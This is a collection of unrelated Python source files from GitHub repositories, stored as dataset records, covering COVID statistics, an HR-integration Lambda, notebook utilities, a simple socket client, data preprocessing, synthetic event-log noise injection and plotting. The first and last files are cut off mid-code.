nostdlist.append(noscases)\n \n nostdoveralldict[i]=nostdlist\n nostdlist=[]\n\nfields=['districtid','overallid','statemean','statestdev']\nostatedata=pd.read_csv('state-overall.csv',usecols=fields)\n\n\n#state mean\nsomeanlist=[]\nsomeanoveralldict={}\nfor i in range(101,728):\n \n socases=float(ostatedata.loc[(ostatedata['overallid']==1) & (ostatedata['districtid']==int(i)) ]['statemean'])\n someanlist.append(socases)\n \n someanoveralldict[i]=someanlist\n someanlist=[]\n\n#state std\nsostdlist=[]\nsostdoveralldict={}\nfor i in range(101,728):\n \n socases=float(ostatedata.loc[(ostatedata['overallid']==1) & (ostatedata['districtid']==int(i)) ]['statestdev'])\n sostdlist.append(socases)\n \n sostdoveralldict[i]=sostdlist\n sostdlist=[]\n\n#creating zscore csv\noveralldict = collections.OrderedDict(sorted(overalldict.items()))\nnomeanoveralldict = collections.OrderedDict(sorted(nomeanoveralldict.items()))\nnostdoveralldict = collections.OrderedDict(sorted(nostdoveralldict.items()))\nsomeanoveralldict = collections.OrderedDict(sorted(someanoveralldict.items()))\nsostdoveralldict = collections.OrderedDict(sorted(sostdoveralldict.items()))\n\n\n\nnhspo=dict()\nncspo=dict()\nshspo=dict()\nscspo=dict()\nfor (k,oc),(k,nm),(k,ns),(k,sm),(k,ss) in zip(overalldict.items(),nomeanoveralldict.items(),nostdoveralldict.items(),someanoveralldict.items(),sostdoveralldict.items()):\n for overallid in range(1):\n if oc[overallid]>(nm[overallid]+ns[overallid]):\n nhspo.setdefault(overallid,[]).append(k)\n if oc[overallid]<(nm[overallid]-ns[overallid]):\n ncspo.setdefault(overallid,[]).append(k)\n if oc[overallid]>(sm[overallid]+ss[overallid]):\n shspo.setdefault(overallid,[]).append(k)\n if oc[overallid]<(sm[overallid]-ss[overallid]):\n scspo.setdefault(overallid,[]).append(k)\n\nwith open('method-spot-overall.csv', mode='w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(['overallid','method','spot','districtid'])\n\n for oid in range(1):\n if oid in nhspo.keys():\n for v in nhspo[oid]:\n csv_writer.writerow([oid+1,'neighborhood','hot',v])\n if oid in ncspo.keys():\n for v1 in ncspo[oid]:\n csv_writer.writerow([oid+1,'neighborhood','cold',v1])\n if oid in shspo.keys():\n for v2 in shspo[oid]:\n csv_writer.writerow([oid+1,'state','hot',v2])\n if oid in scspo.keys():\n for v3 in scspo[oid]:\n
 csv_writer.writerow([oid+1,'state','cold',v3])\n\n\n","repo_name":"leoevenss/Covid-Data-Analysis","sub_path":"method-spot-generator.py","file_name":"method-spot-generator.py","file_ext":"py","file_size_in_byte":11085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5768947633","text":"import traceback\nimport json\nimport requests\nimport os\n\nfrom ssm_util import fetch_ssm_params\nfrom customlist_data_builder import CustomlistItemDataBuilder\nfrom constants import IMAGE_PATH\nfrom builder_client import BuilderClient\n\n\ndef add_employee_to_guide(event, context):\n \"\"\"\n This lambda adds a new employee\n to the guide after they are added\n in Zenefits\n \"\"\"\n\n try:\n # Fetch the Builder API key, the guide ID of the guide where the content\n # is published, and the custom list ID that the items are associated with\n api_key, guide_and_list_ids, zenefits_app_key = fetch_ssm_params()\n\n # Initialize a Session\n builder_client = BuilderClient(api_key)\n\n for guide_id, employee_customlist_id in guide_and_list_ids:\n # Use the lambda event data to build a CustomListItem\n employee_data = event[\"data\"]\n customlist_data_builder = CustomlistItemDataBuilder(guide_id, zenefits_app_key)\n customlist_data = customlist_data_builder.build(employee_data)\n\n # Create a new CustomListItem in Builder\n url = f\"https://builder.guidebook.com/open-api/v1/custom-list-items/?guide={guide_id}&custom_lists={employee_customlist_id}\"\n photo_available = False\n if employee_data.get('photo_url'):\n img_response = requests.get(employee_data['photo_url'])\n photo_available = True if img_response.status_code == 200 else False\n\n if photo_available:\n with open(IMAGE_PATH, 'wb') as handler:\n handler.write(img_response.content)\n with open(IMAGE_PATH, 'rb') as handler:\n response = builder_client.post(url, customlist_data, {\"thumbnail\": handler})\n os.remove(IMAGE_PATH)\n else:\n response = builder_client.post(url, customlist_data)\n\n # Create a new CustomListItemRelation in Builder\n relations_data = {\n \"custom_list\": employee_customlist_id,\n \"custom_list_item\": response.json()[\"id\"],\n }\n url = \"https://builder.guidebook.com/open-api/v1/custom-list-item-relations/\"\n builder_client.post(url, data=relations_data)\n\n # Publish the changes\n response = builder_client.post(f\"https://builder.guidebook.com/open-api/v1/guides/{guide_id}/publish/\", raise_error=False)\n if response.status_code == 403:\n print(response.content)\n\n except Exception as e:\n print(e)\n traceback.print_exc()\n return {\"statusCode\": 500}\n\n return {\"statusCode\": 200}\n","repo_name":"Guidebook/guidebook-zenefits-integration","sub_path":"add_new_employee_webhook_receiver.py","file_name":"add_new_employee_webhook_receiver.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31396886982","text":"import builtins\nimport difflib\nimport os\nimport re\nimport subprocess # nosec\nimport sys\nimport uuid\nimport warnings\nfrom pathlib import Path\nfrom typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union\n\nimport pkg_resources\nfrom deprecated.sphinx import deprecated\nfrom IPython import get_ipython\nfrom IPython.core.display import HTML, display\nfrom tqdm import tqdm, tqdm_notebook\n\nfrom .._version import VERSION\n\n__version__ = VERSION\n__author__ = \"Ian Hellen\"\n\n\ndef export(func: Callable):\n \"\"\"Decorate function or
 class to export to __all__.\"\"\"\n mod = sys.modules[func.__module__]\n if hasattr(mod, \"__all__\"):\n all_list = getattr(mod, \"__all__\")\n all_list.append(func.__name__)\n else:\n all_list = [func.__name__]\n setattr(mod, \"__all__\", all_list)\n return func\n\n\n@export\ndef string_empty(string: str) -> bool:\n \"\"\"Return True if the input string is None or whitespace.\"\"\"\n return (string is None) or not (string and string.strip())\n\n\n@export\ndef is_not_empty(test_object: Any) -> bool:\n \"\"\"Return True if the test_object is not None or empty.\"\"\"\n if test_object:\n if isinstance(test_object, str):\n if test_object.strip():\n # test_object is not None AND myString is not empty or blank\n return True\n return False\n return True\n return False\n\n\n# Toggle Code Cell Contents\n_TOGGLE_CODE_STR = \"\"\"\n
<form action=\"javascript:code_toggle()\">\n <input type=\"submit\" id=\"toggleButton\" value=\"Toggle Code\">\n</form>
\n\"\"\"\n\n_TOGGLE_CODE_PREPARE_STR = \"\"\"\n <script>\n function code_toggle() {\n if ($('div.cell.code_cell.rendered.selected div.input').css('display') != 'none') {\n $('div.cell.code_cell.rendered.selected div.input').hide();\n } else {\n $('div.cell.code_cell.rendered.selected div.input').show();\n }\n }\n </script>\n\"\"\"\n\n\n@export\ndef enable_toggle_code():\n \"\"\"Load JS Function to enable code toggle button.\"\"\"\n display(HTML(_TOGGLE_CODE_PREPARE_STR))\n\n\n@export\ndef toggle_code():\n \"\"\"Display a toggle button to hide/reveal code cell.\"\"\"\n display(HTML(_TOGGLE_CODE_STR))\n\n\n# String escapes\n@export\ndef escape_windows_path(str_path: str) -> str:\n \"\"\"Escape backslash characters in a string.\"\"\"\n if is_not_empty(str_path):\n return str_path.replace(\"\\\\\", \"\\\\\\\\\")\n return str_path\n\n\n@export\ndef unescape_windows_path(str_path: str) -> str:\n \"\"\"Remove escaping from backslash characters in a string.\"\"\"\n if is_not_empty(str_path):\n return str_path.replace(\"\\\\\\\\\", \"\\\\\")\n return str_path\n\n\n@deprecated(reason=\"Inline Javascript no longer supported\", version=\"0.3.2\")\n@export\ndef get_nb_query_param(nb_url_search: str, param: str) -> Optional[str]:\n \"\"\"\n Get a url query parameter from the search string.\n\n Parameters\n ----------\n nb_url_search: str\n The URL search string\n param: str\n The parameter name to search for\n\n Returns\n -------\n Optional[str]\n value of the query string parameter or None if not found.\n\n \"\"\"\n qs_regex = r\"[\\\\?&]{param}=(?P<val>[^&#]*)\".format(param=param)\n query_string_match = re.search(qs_regex, nb_url_search)\n if query_string_match:\n return query_string_match[\"val\"]\n return None\n\n\n@deprecated(reason=\"Inline Javascript no longer supported\", version=\"0.3.2\")\n@export\ndef get_nb_query_params(nb_url_search: str) -> dict:\n \"\"\"\n Get the url query parameters from the search string.\n\n Parameters\n ----------\n nb_url_search : str\n The URL search string\n\n Returns\n -------\n dict\n dictionary of the query string parameters.\n\n \"\"\"\n nb_params = {}\n query_string_match = re.search(r\"\\?(?P<qs>[^#]+)#?\", nb_url_search)\n if query_string_match:\n for param in query_string_match[\"qs\"].split(\"&\"):\n if \"=\" in param:\n nb_params[param.split(\"=\")[0]] = param.split(\"=\")[1]\n return nb_params\n\n\n@deprecated(reason=\"Inline Javascript no longer supported\", version=\"0.3.2\")\n@export\ndef get_notebook_query_string():\n \"\"\"Execute javascript to publish notebook query string as python variable.\"\"\"\n HTML(\n \"\"\"\n <script type=\"text/javascript\">\n IPython.notebook.kernel.execute(\n \"nb_query_string='\" + window.location.search + \"'\");\n </script>\n \"\"\"\n )\n\n\n@export\ndef check_py_version(min_ver: Tuple = (3, 6)):\n \"\"\"\n Check that the current python version is not less than `min_ver`.\n\n Parameters\n ----------\n min_ver : Tuple, optional\n Minimum required version, by default (3,6)\n\n \"\"\"\n if isinstance(min_ver, (float, str)):\n min_ver_list = str(min_ver).split(\".\")\n min_ver = (int(min_ver_list[0]), int(min_ver_list[1]))\n if sys.version_info < min_ver:\n print(\"Check the Kernel->Change Kernel menu and ensure that Python 3.6\")\n print(\"or later is selected as the active kernel.\")\n raise SystemExit(\n \"Python %s.%s or later is required.\\n\" % (min_ver[0], min_ver[1])\n )\n\n\n@export\ndef resolve_pkg_path(part_path: str):\n \"\"\"\n Resolve a path relative to the package.\n\n Parameters\n ----------\n part_path : str\n Absolute or relative path to resolve.\n\n \"\"\"\n if Path(part_path).is_absolute():\n return part_path\n\n resolved_path = str(Path(__file__).resolve().parent.parent.joinpath(part_path))\n if Path(resolved_path).exists():\n return str(resolved_path)\n\n searched_paths = list(\n Path(__file__).resolve().parent.parent.glob(str(Path(\"**\").joinpath(part_path)))\n )\n if not searched_paths or len(searched_paths)
 > 1:\n warnings.warn(f\"No path or ambiguous match for {part_path} not found\")\n return None\n return str(searched_paths[0])\n\n\n# pylint: disable=not-an-iterable, too-many-branches\n@export # noqa: MC0001\ndef check_and_install_missing_packages(\n required_packages: List[str],\n force_notebook: bool = False,\n user: bool = True,\n upgrade: bool = False,\n) -> bool:\n \"\"\"\n Check and install missing packages from provided list of packages.\n\n Parameters\n ----------\n required_packages : List[str]\n List of packages to check and install in the current environment\n Note you can add package version constraints by appending them to\n the package name, e.g. `pandas>=1.01`\n force_notebook : bool, optional\n Boolean value to force notebook version of progress bar,\n by default False (autodetect)\n user : bool, optional\n Boolean value to toggle user flag while installing pip packages,\n by default True\n upgrade: bool, optional\n If true supply `--upgrade` flag to pip to install the latest\n version (applies to all packages in `required_packages`)\n\n Returns\n -------\n bool :\n True if successful, else False\n\n \"\"\"\n missing_packages = []\n # Check package requirements against installed set\n for req in required_packages:\n pkg_req = pkg_resources.Requirement.parse(req)\n try:\n found_pkg = pkg_resources.working_set.find(pkg_req)\n except pkg_resources.VersionConflict:\n found_pkg = None\n if found_pkg is None:\n missing_packages.append(req)\n\n if not missing_packages:\n print(\"All packages are already installed\")\n return True\n\n print(\"Missing packages to be installed: \", *missing_packages, sep=\" \")\n if is_ipython() or force_notebook:\n pkgbar = tqdm_notebook(missing_packages, desc=\"Installing...\", unit=\"bytes\")\n else:\n pkgbar = tqdm(missing_packages, desc=\"Installing...\", unit=\"bytes\")\n\n pkg_command = [\"pip\", \"install\"]\n if user:\n pkg_command.append(\"--user\")\n if upgrade:\n pkg_command.append(\"--upgrade\")\n pkg_success = True\n for package in pkgbar:\n try:\n subprocess.run( # nosec\n pkg_command + [package],\n check=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n except subprocess.CalledProcessError as proc_err:\n print(f\"An Error has occurred while installing {package}.\")\n print(f\"Output: {str(proc_err.stdout)}\")\n print(f\"Errs: {str(proc_err.stderr)}\")\n pkg_success = False\n print(f\"{package} installed.\")\n\n return pkg_success\n\n\n# pylint: enable=not-an-iterable, too-many-branches\n\n\n# pylint: disable=invalid-name\n@export\ndef md(string: str, styles: Union[str, Iterable[str]] = None):\n \"\"\"\n Return string as Markdown with optional style.\n\n Parameters\n ----------\n string : str\n The string to display\n styles : Union[str, Iterable[str]], optional\n A style mnemonic or collection of styles. If multiple styles,\n these can be supplied as an iterable of strings or a comma-separated\n string, by default None\n\n \"\"\"\n style_str = \"\"\n if isinstance(styles, str):\n if \",\" in styles:\n styles = [style.strip() for style in styles.split(\",\")]\n else:\n style_str = _F_STYLES.get(styles, \"\")\n if isinstance(styles, list):\n style_str = \";\".join([_F_STYLES.get(style, \"\") for style in styles])\n display(HTML(f\"<p style='{style_str}'>{string}</p>\"))\n\n\n# pylint: enable=invalid-name\n\n\n@export\ndef md_warn(string: str):\n \"\"\"\n Return string as a warning - orange text prefixed by \"Warning\".\n\n Parameters\n ----------\n string : str\n The warning message.\n\n \"\"\"\n md(f\"Warning: {string}\", \"bold, orange, large\")\n\n\n@export\ndef md_error(string: str):\n \"\"\"\n Return string as an error - red text prefixed by \"Error\".\n\n Parameters\n ----------\n string : str\n The error message.\n\n \"\"\"\n md(f\"Error: {string}\", \"bold, orange, large\")\n\n\n# Styles available to use in the above Markdown tools.\n_F_STYLES = {\n \"bold\": \"font-weight: bold\",\n \"italic\": \"font-style: italic\",\n \"red\": \"color: red\",\n \"green\": \"color: green\",\n \"blue\": \"color: blue\",\n \"large\": \"font-size: 130%\",\n \"heading\": \"font-size: 200%\",\n}\n\n\n@export\ndef is_ipython() -> bool:\n \"\"\"\n Return True if running in IPython environment.\n\n Returns\n -------\n bool\n True if running in IPython environment,\n otherwise False\n\n \"\"\"\n return bool(get_ipython())\n\n\ndef check_kwarg(arg_name: str, legal_args: List[str]):\n \"\"\"\n Check argument names against a list.\n\n Parameters\n ----------\n arg_name : str\n Argument to check\n legal_args : List[str]\n List of possible arguments.\n\n Raises\n ------\n NameError\n If the argument is not legal. If the `arg_name` is\n a close match to one or more `legal_args`, these are\n returned in the exception.\n\n \"\"\"\n if arg_name not in legal_args:\n closest = difflib.get_close_matches(arg_name, legal_args)\n mssg = f\"{arg_name} is not a recognized argument. \"\n if len(closest) == 1:\n mssg += f\"Closest match is '{closest[0]}'\"\n elif closest:\n match_list = [f\"'{mtch}'\" for mtch in closest]\n mssg += f\"Closest matches are {', '.join(match_list)}\"\n else:\n mssg += f\"Valid arguments are {', '.join(legal_args)}\"\n raise NameError(arg_name, mssg)\n\n\ndef check_kwargs(supplied_args: Dict[str, Any], legal_args: List[str]):\n \"\"\"\n Check all kwargs names against a list.\n\n Parameters\n ----------\n supplied_args : Dict[str, Any]\n Arguments to check\n legal_args : List[str]\n List of possible arguments.\n\n Raises\n ------\n NameError\n If any of the arguments are not legal.
 If an arg is\n a close match to one or more `legal_args`, these are\n returned in the exception.\n\n \"\"\"\n name_errs = []\n for name in supplied_args:\n try:\n check_kwarg(name, legal_args)\n except NameError as err:\n name_errs.append(err)\n if name_errs:\n raise NameError(name_errs)\n\n\n_U_TEST_ENV = \"MP_UNIT_TEST\"\n\n\ndef unit_testing() -> bool:\n \"\"\"\n Return True if in unit testing.\n\n Returns\n -------\n bool\n True if in unit testing\n\n \"\"\"\n return _U_TEST_ENV in os.environ\n\n\n# pylint: disable=invalid-name\ndef set_unit_testing(on: bool = True):\n \"\"\"\n Set flag env var to indicate that code is being unit-tested.\n\n Parameters\n ----------\n on : bool, optional\n Turn unit testing flag on or off, by default True\n\n \"\"\"\n if on:\n os.environ[_U_TEST_ENV] = \"True\"\n else:\n os.environ.pop(_U_TEST_ENV, None)\n\n\n# pylint: enable=invalid-name\n\n\ndef is_valid_uuid(uuid_str: Any) -> bool:\n \"\"\"\n Return true if `uuid_str` is a valid GUID/UUID.\n\n Parameters\n ----------\n uuid_str : Any\n String to test\n\n Returns\n -------\n bool\n True if valid GUID/UUID.\n\n \"\"\"\n if not uuid_str:\n return False\n try:\n uuid.UUID(uuid_str)\n except (ValueError, TypeError):\n return False\n return True\n\n\ndef valid_pyname(identifier: str) -> str:\n \"\"\"\n Return legal Python identifier, which doesn't collide with builtins.\n\n Parameters\n ----------\n identifier : str\n The input identifier\n\n Returns\n -------\n str\n The cleaned identifier\n\n \"\"\"\n builtin_names = set(dir(builtins))\n if identifier in builtin_names:\n identifier = f\"{identifier}_bi\"\n identifier = re.sub(\"[^a-zA-Z0-9_]\", \"_\", identifier)\n if identifier[0].isdigit():\n identifier = f\"n_{identifier}\"\n return identifier\n","repo_name":"WeilerWebServices/VirusTotal","sub_path":"msticpy/msticpy/common/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":13643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"26536587098","text":"import socket\n\ndef send_http_request(s, method, url):\n request = f\"{method.upper()} {url} HTTP/1.1\\r\\n\\r\\n\"\n s.sendall(request.encode(\"utf-8\"))\n s.shutdown(socket.SHUT_WR)\n\ndef read_responce(s):\n buf = []\n while True:\n chunk = s.recv(1024)\n if not chunk:\n break\n buf.append(chunk)\n return b''.join(buf)\n","repo_name":"python-fiit/public-materials","sub_path":"25-socket-client/examples/stupid_http_client.py","file_name":"stupid_http_client.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"59059481","text":"import tensorflow\nimport glob\nimport collections\nimport os\nimport pandas as pd\nimport pygal\nfrom collections import Counter\nimport shutil\nimport helpers\n\ndir_name_default = \"D:/dataset/IMGs\"\ndest_dir_name_default = \"D:/dataset/ProcessedData\"\n\nSteeringAngles = []\nFrameNum = []\nImageName = []\nFiles = []\nThrottle = []\n\n\ndir_name = input(\"Please input your images dir:\")\ndest_dir_name = input(\"Please input your destination dir:\")\nstatistics = input(\"Do you want statistics ?\")\n\nif not dir_name:\n dir_name = dir_name_default\n\nif not dest_dir_name:\n dest_dir_name = dest_dir_name_default\n\nfor file in os.listdir(dir_name):\n if file.endswith(\".jpg\"):\n cut = file.split('_')\n SteeringAngles.append(cut[5])\n FrameNum.append(int(cut[1]))\n Throttle.append(cut[3])\n Files.append(file)\n\nhelpers.moveFiles(dest_dir_name,
 dir_name, Files, ImageName)\n\nData = pd.DataFrame({\n \"ImageName\":ImageName,\n \"Frame\":FrameNum,\n \"SteeringAngles\":SteeringAngles,\n \"Throttle\": Throttle,\n })\n\nhelpers.writeCsv(dest_dir_name, Data)\n\n'''\nStatistics Section\n'''\nif statistics == 'y' or statistics == 'yes':\n ChartData = [round(float(x), 1) for x in SteeringAngles]\n MostCommon = Counter(ChartData).most_common(10)\n\n SteeringAnglesChart = pygal.Bar()\n SteeringAnglesChart.title = \"Steering Angles\"\n\n for i in MostCommon:\n SteeringAnglesChart.add(str(i[0]), i[1])\n\n SteeringAnglesChart.render_to_file('../charts/SteeringAnglesChart.svg')\n\nprint(\"---------------------------------\")\nprint(\"Data preparation was successful!\")\nprint(\"---------------------------------\")","repo_name":"Tudor1415/SelfDrivingCarPrototype","sub_path":"DataCollection/preProcessing/getFiles.py","file_name":"getFiles.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21552883278","text":"L = [\"2_ref.txt\",\"3_ref.txt\", \"4_ref.txt\", \"5_ref.txt\", \"6_ref.txt\", \"7_ref.txt\"]\n\nfor file_name in L:\n\tprint(file_name)\n\twith open (file_name, 'r') as f:\n\t\ts = f.readline()\n\t\tchar_nums = {}\n\t\tcount = 0\n\t\tfor c in s:\n\t\t\tif c in char_nums:\n\t\t\t\tchar_nums[c] += 1\n\t\t\telse:\n\t\t\t\tchar_nums[c] = 1\n\t\t\tcount += 1\n\t\t\t# if count >= 100000: break\n\tfor key, value in sorted(char_nums.items(), key=lambda x: x[0]):\n\t\tprint(\" {} : {}\".format(key,value))\n","repo_name":"ArnavM1499/ehrenfeucht-myrcielski-sequence-generalization","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11086493985","text":"from tkinter import filedialog\nfrom pm4py.objects.log.importer.xes import importer as xes_importer\nfrom pm4py.objects.log.exporter.xes import exporter as xes_exporter\nimport numpy as np\nimport os\n\n\nclass CorruptFileSystem:\n def __init__(self):\n self.change_archive_filename = None\n self.filename = None\n self.repaired_filename = None\n self.log = None\n self.list_for_corruption = []\n self.conditions = []\n\n def get_repair_conditions(self):\n self.change_conditions_file = filedialog.askopenfilename(\n title='Select changes',\n filetypes=(('text files', \"*.txt\"),))\n file = open(self.change_conditions_file, 'r')\n lines = file.readlines()\n for line in lines:\n content = line.split(',') # split on comma\n clean_condition = [element.strip('\\n') for element in content]\n self.list_for_corruption.append(clean_condition)\n for element in self.list_for_corruption:\n print(element)\n\n print('Number of elements:', len(self.list_for_corruption))\n\n def update_corrupt_file(self):\n self.filename = filedialog.askopenfilename(title=\"Select a File ...\",\n filetypes=(\n (\"eventlog files\", \"*.xes\"), (\"eventlog files\", \"*.csv\"),\n (\"all files\", \".*\")))\n file_str = os.path.basename(self.filename)\n initial_file_name = f'corr_{file_str}'\n self.repaired_filename = filedialog.asksaveasfilename(initialfile=initial_file_name,\n defaultextension='.xes',\n title='Save File after Repair',\n filetypes=(\n (\"eventlog files\", \"*.xes\"),\n (\"eventlog files\", \"*.csv\"),\n (\"all files\", \".*\")))\n print(self.repaired_filename)\n\n if self.repaired_filename:\n self.log = xes_importer.apply(self.filename)\n counter =
 0\n changed = 0\n print(self.log.attributes.get('concept:name', 'concept:name not available'))\n for trace in self.log:\n for event in trace:\n counter += 1\n for condition in self.list_for_corruption:\n if len(condition) != 3: # skip when error in condition\n continue\n key1, original_value1, suggested_value1 = condition\n # create the labels start and correct right in front; if a change was made, these are updated\n event[f'start:{key1}'] = original_value1\n event[f'correct:{key1}'] = original_value1\n if event[key1] == original_value1:\n selection = np.random.choice(2, 1, p=[0.992, 0.008]) # randomize changes\n if selection == 1:\n event[key1] = suggested_value1\n changed += 1\n event[f'start:{key1}'] = suggested_value1\n event[f'correct:{key1}'] = original_value1\n\n if counter % 5000 == 0: # get feedback for user\n print(f'{changed} elements were adapted.')\n\n try:\n self.log.attributes['synthetic:changes'] = f'{changed} elements in {counter} events were manipulated: {self.list_for_corruption}'\n except TypeError:\n pass\n\n print(counter)\n print(changed)\n xes_exporter.apply(self.log, self.repaired_filename)\n print('Successful export.')\n else:\n print('No file to save was chosen.')\n\n\nif __name__ == '__main__':\n corruption = CorruptFileSystem()\n corruption.get_repair_conditions()\n corruption.update_corrupt_file()\n","repo_name":"jwiltfang/bachelor-thesis","sub_path":"nlp_label_quality/evaluation/corrupt_files/write_selfcorrupted_log.py","file_name":"write_selfcorrupted_log.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"27224573327","text":"import matplotlib.pyplot as plt\nfrom matplotlib.patches import Ellipse\nimport seaborn as sns\nimport numpy as np\n\ndef trust_diagram(RAIRs, RSRs, RAIDs, RSTs, labels, confidence=None, filename=\"trust-diagram\"):\n fig, axs = plt.subplots(ncols=2, sharex=False, sharey=False, figsize=(10,5))\n plt.subplots_adjust(wspace=0.05, hspace=0)\n\n palette = sns.color_palette(\"colorblind\", 2)\n\n for i in range(len(RAIDs)):\n if confidence == 'ellipse':\n el = Ellipse(xy = (RAIDs[i].mean(), RSRs[i].mean()),\n width=2*1.96*RAIDs[i].std()/np.sqrt(len(RAIDs[i])),\n height=2*1.96*RSRs[i].std()/np.sqrt(len(RSRs[i])),\n label = labels[i], edgecolor=palette[i], facecolor=palette[i], alpha=0.6)\n \n axs[0].add_patch(el)\n elif confidence == 'error':\n axs[0].errorbar(RAIDs[i].mean(), RSRs[i].mean(),\n xerr=1.96*RAIDs[i].std()/np.sqrt(len(RAIDs[i])),\n yerr=1.96*RSRs[i].std()/np.sqrt(len(RSRs[i])),\n label=labels[i], color=palette[i])\n else:\n axs[0].scatter(RAIDs[i].mean(), RSRs[i].mean(), label=labels[i], color=palette[i])\n\n axs[0].axhline(y = 0.5, color='k', ls='--', alpha=0.5)\n axs[0].axvline(x = 0.5, color='k', ls='--', alpha=0.5)\n axs[0].fill_between([-0.02,1.02], -0.02, 0.5, color='red', alpha=0.2, label=\"Automation Bias\") #low RSR\n axs[0].fill_betweenx([-0.02,1.02], -0.02, 0.5, color='blue', alpha=0.2, label=\"Automation Complacency\") #low RAIR\n\n axs[0].set_xlim(-0.02, 1.02)\n axs[0].set_ylim(-0.02, 1.02)\n axs[0].set_xlabel(\"Relative Beneficial Over-distrust (RBOD)\")\n axs[0].set_ylabel(\"Relative Beneficial Distrust (RBD)\")\n axs[0].legend(loc='center', bbox_to_anchor=(0.5,1.1), ncol=2)\n\n for i in range(len(RSTs)):\n if confidence == 'ellipse':\n el = Ellipse(xy = (RAIRs[i].mean(), RSTs[i].mean()),\n width=2*1.96*RAIRs[i].std()/np.sqrt(len(RAIRs[i])),\n height=2*1.96*RSTs[i].std()/np.sqrt(len(RSTs[i])),\n label =
 labels[i], edgecolor=palette[i], facecolor=palette[i], alpha=0.6)\n \n axs[1].add_patch(el)\n elif confidence == 'error':\n axs[1].errorbar(RAIRs[i].mean(), RSTs[i].mean(),\n xerr=1.96*RAIRs[i].std()/np.sqrt(len(RAIRs[i])),\n yerr=1.96*RSTs[i].std()/np.sqrt(len(RSTs[i])),\n label=labels[i], color=palette[i])\n else:\n axs[1].scatter(RAIRs[i].mean(), RSTs[i].mean(), label=labels[i], color=palette[i])\n\n axs[1].axhline(y = 0.5, color='k', ls='--', alpha=0.5)\n axs[1].axvline(x = 0.5, color='k', ls='--', alpha=0.5)\n axs[1].fill_between([-0.02,1.02], -0.02, 0.5, color='red', alpha=0.2, label=\"Algorithmic Aversion\") #low RAID\n axs[1].fill_betweenx([-0.02,1.02], -0.02, 0.5, color='blue', alpha=0.2, label=\"Conservatism Bias\") #low RST\n\n axs[1].set_xlim(-0.02, 1.02)\n axs[1].set_ylim(-0.02, 1.02)\n axs[1].set_xlabel(\"Relative Beneficial Over-trust (RBOT)\")\n axs[1].set_ylabel(\"Relative Beneficial Trust (RBT)\")\n axs[1].yaxis.tick_right()\n axs[1].yaxis.set_label_position(\"right\")\n axs[1].invert_xaxis()\n axs[1].legend(loc='center', bbox_to_anchor=(0.5,1.1), ncol=2)\n\n plt.savefig(filename + \".png\", dpi=300, bbox_inches=\"tight\")","repo_name":"AndreaCampagner/qualiMLpy","sub_path":"viz/trust_diagram.py","file_name":"trust_diagram.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"2324601697","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\nimport os\nimport sys\n\nfrom scout_apm.core.git_revision import GitRevision\nfrom scout_apm.core.platform_detection import PlatformDetection\nfrom scout_apm.core.util import octal\n\nlogger = logging.getLogger(__name__)\n\n\nclass ScoutConfig(object):\n \"\"\"\n Configuration object for the ScoutApm agent.\n\n Contains a list of configuration \"layers\". When a configuration key is\n looked up, each layer is asked in turn if it knows the value.
 The first one\n to answer affirmatively returns the value.\n \"\"\"\n\n def __init__(self):\n self.layers = [\n ScoutConfigEnv(),\n ScoutConfigPython(),\n ScoutConfigDerived(self),\n ScoutConfigDefaults(),\n ScoutConfigNull(),\n ]\n\n def value(self, key):\n value = self.locate_layer_for_key(key).value(key)\n if key in CONVERSIONS:\n converted_value = CONVERSIONS[key].convert(value)\n else:\n converted_value = value\n\n return converted_value\n\n def locate_layer_for_key(self, key):\n for layer in self.layers:\n if layer.has_config(key):\n return layer\n else: # pragma: no cover\n # Not reachable because ScoutConfigNull returns None for all keys.\n assert False, \"key not found in any layer\"\n\n def log(self):\n logger.debug(\"Configuration Loaded:\")\n for key in self.known_keys():\n layer = self.locate_layer_for_key(key)\n logger.debug(\"%-9s: %s = %s\", layer.name(), key, layer.value(key))\n\n def known_keys(self):\n return [\n \"app_server\",\n \"application_root\",\n \"core_agent_dir\",\n \"core_agent_download\",\n \"core_agent_launch\",\n \"core_agent_permissions\",\n \"core_agent_version\",\n \"disabled_instruments\",\n \"download_url\",\n \"framework\",\n \"framework_version\",\n \"hostname\",\n \"ignore\",\n \"key\",\n \"log_level\",\n \"monitor\",\n \"name\",\n \"revision_sha\",\n \"scm_subdirectory\",\n \"socket_path\",\n ]\n\n def core_agent_permissions(self):\n try:\n return octal(self.value(\"core_agent_permissions\"))\n except ValueError as e:\n logger.error(\n \"Invalid core_agent_permissions value: %s.\" \" Using default: %s\",\n repr(e),\n 0o700,\n )\n return 0o700\n\n @classmethod\n def set(cls, **kwargs):\n \"\"\"\n Sets a configuration value for the Scout agent. Values set here will\n not override values set in ENV.\n \"\"\"\n global SCOUT_PYTHON_VALUES\n for key, value in kwargs.items():\n SCOUT_PYTHON_VALUES[key] = value\n\n @classmethod\n def reset_all(cls):\n \"\"\"\n Remove all configuration settings set via `ScoutConfig.set(...)`.\n\n This is meant for use in testing.\n \"\"\"\n global SCOUT_PYTHON_VALUES\n SCOUT_PYTHON_VALUES.clear()\n\n\n# Module-level data, the ScoutConfig.set(key=\"value\") adds to this\nSCOUT_PYTHON_VALUES = {}\n\n\nclass ScoutConfigPython(object):\n \"\"\"\n A configuration overlay that lets other parts of python set values.\n \"\"\"\n\n def 